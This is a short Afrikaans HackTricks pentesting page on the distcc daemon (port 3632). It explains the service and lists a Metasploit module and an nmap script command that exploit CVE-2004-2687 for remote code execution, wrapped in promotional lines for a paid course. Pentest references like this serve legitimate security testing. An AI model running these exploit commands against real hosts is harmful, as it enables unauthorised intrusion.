hacktricks/network-services-pentesting/3632-pentesting-distcc.md
2024-02-11 02:07:06 +00:00

3.3 KiB

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Basiese Inligting

Distcc is 'n instrument wat die kompilasieproses verbeter deur gebruik te maak van die onbenutte verwerkingkrag van ander rekenaars in die netwerk. Wanneer distcc op 'n masjien opgestel is, is hierdie masjien in staat om sy kompilasietaak na 'n ander stelsel te versprei. Hierdie ontvangende stelsel moet die distccd daemon laat loop en 'n verenigbare kompilator geïnstalleer hê om die gestuurde kode te verwerk.

Verstekpoort: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Uitbuiting

Kyk of dit vatbaar is vir CVE-2004-2687 om willekeurige kode uit te voer:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

Ek dink nie Shodan detect hierdie diens nie.

Hulpbronne

Pos geskep deur Álex B (@r1p)

Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: